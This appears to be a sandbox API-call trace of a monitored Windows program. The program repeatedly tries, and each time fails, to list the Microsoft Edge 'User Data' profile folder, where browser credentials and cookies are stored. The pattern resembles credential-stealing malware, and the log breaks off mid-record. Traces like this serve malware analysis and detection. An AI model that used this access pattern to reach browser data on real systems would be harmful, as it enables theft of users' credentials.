[0207.010] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.010] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.011] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.011] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.011] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.011] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.011] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.011] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.011] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.011] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.011] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.011] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.011] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.012] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.012] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.012] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.012] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.012] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.012] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.012] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.012] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.012] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.012] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.012] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.012] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.012] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.013] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.013] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.013] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.013] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.013] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.013] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.013] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.013] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.013] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.013] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.013] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.013] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.013] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.014] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.014] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.014] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.014] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.014] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.014] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.014] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.014] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.014] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.014] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.014] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.014] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.015] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.015] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.078] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.078] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.079] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.079] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.079] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.079] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.079] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.079] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.079] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.079] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.079] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.080] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, nFileSizeLow=0x650074, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.080] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*") returned 64 [0207.080] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x200072, ftCreationTime.dwLowDateTime=0x610044, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x4c005c, ftLastAccessTime.dwHighDateTime=0x63006f, ftLastWriteTime.dwLowDateTime=0x6c0061, ftLastWriteTime.dwHighDateTime=0x530020, nFileSizeHigh=0x610074, 